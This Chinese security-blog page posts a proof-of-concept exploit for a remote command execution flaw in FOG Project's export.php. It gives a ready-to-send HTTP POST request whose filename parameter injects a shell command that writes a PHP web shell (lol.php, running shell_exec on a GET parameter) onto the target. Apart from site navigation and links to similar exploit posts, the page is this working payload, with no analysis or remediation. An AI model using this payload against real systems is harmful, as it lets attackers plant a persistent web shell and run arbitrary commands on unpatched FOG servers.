fogproject系统接口export.php存在远程命令执行漏洞

0415

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd’”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1
Host: 192.168.15.5
Content-Length: 21
User-Agent: ToxicPotato
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

fogguiuser=fog&nojson=2

© 版权声明
本文链接:
From
秃兔安全
隐私政策
PrivacyPolicy
用户协议
UseGenerator
许可协议
NC-SA 4.0
THE END
2024你懂的POC
喜欢就支持一下吧
点赞5 分享
秃兔的头像_秃兔安全至尊玉兔
【在线工具】医学领域·心理症状自评量表SCL-90_秃兔安全
【在线工具】医学领域·心理症状自评量表SCL-90
【在线工具】医学领域·心理症状自评量表SCL-90
3个月前 1645
【蓝队文库】00 导语_秃兔安全
【蓝队文库】00 导语
【蓝队文库】00 导语
5个月前 1166
紫兔网络安全流量日志自动化分析研判_秃兔安全
紫兔网络安全流量日志自动化分析研判
紫兔网络安全流量日志自动化分析研判
2个月前 1102
【红队文库】01 系统命令相关_秃兔安全
【红队文库】01 系统命令相关
【红队文库】01 系统命令相关
5个月前 661
【红队文库】03 内网渗透_秃兔安全
【红队文库】03 内网渗透
【红队文库】03 内网渗透
5个月前 589
紫兔历史CVE漏洞查询平台_秃兔安全
紫兔历史CVE漏洞查询平台
紫兔历史CVE漏洞查询平台
2个月前 501
相关推荐
【通用】万能门店小程序sql注入漏洞_秃兔安全
【通用】万能门店小程序sql注入漏洞
【通用】万能门店小程序sql注入漏洞
5个月前 207
【通用】CVE-2024-37032 Ollama 远程代码执行漏洞_秃兔安全
【通用】CVE-2024-37032 Ollama 远程代码执行漏洞
【通用】CVE-2024-37032 Ollama 远程代码执行漏洞
2个月前 133
【通用】 当虹直播编转码系统 Arcvideo Live存在任意文件上传漏洞_秃兔安全
【通用】 当虹直播编转码系统 Arcvideo Live存在任意文件上传漏洞
【通用】 当虹直播编转码系统 Arcvideo Live存在任意文件上传漏洞
5个月前 131
【通用】 九思OA upload_l.jsp 任意文件上传_秃兔安全
【通用】 九思OA upload_l.jsp 任意文件上传
【通用】 九思OA upload_l.jsp 任意文件上传
5个月前 118
【通用】飞致云 DataEase JWT 硬编码身份认证绕过漏洞 (CVE-2024-52295)_秃兔安全
【通用】飞致云 DataEase JWT 硬编码身份认证绕过漏洞 (CVE-2024-52295)
【通用】飞致云 DataEase JWT 硬编码身份认证绕过漏洞 (CVE-2024-52295)
3个月前 110
【通用】科达多媒体录播系统存在信息泄露漏洞_秃兔安全
【通用】科达多媒体录播系统存在信息泄露漏洞
【通用】科达多媒体录播系统存在信息泄露漏洞
5个月前 99
评论 抢沙发

请登录后发表评论

    暂无评论内容

用户封面
秃兔的头像_秃兔安全至尊玉兔
DeepSeek 安全服务与等保测评提示指南_秃兔安全
DeepSeek 安全服务与等保测评提示指南
DeepSeek 安全服务与等保测评提示指南
1个月前 77
DeepSeek 网络安全行业深度提示指南_秃兔安全
DeepSeek 网络安全行业深度提示指南
DeepSeek 网络安全行业深度提示指南
1个月前 80
防御对抗配置教程蓝队文库红队文库红队打点工具红队等保测评源码渗透测试工具渗透测试渗透文库海康威视综合利用工具浏览器插件插件开发批量检测打点学习资源内网渗透云资产管理工具yaml

【在线工具】医学领域·心理症状自评量表SCL-90

【蓝队文库】00 导语

紫兔网络安全流量日志自动化分析研判

【红队文库】01 系统命令相关

【红队文库】03 内网渗透

紫兔历史CVE漏洞查询平台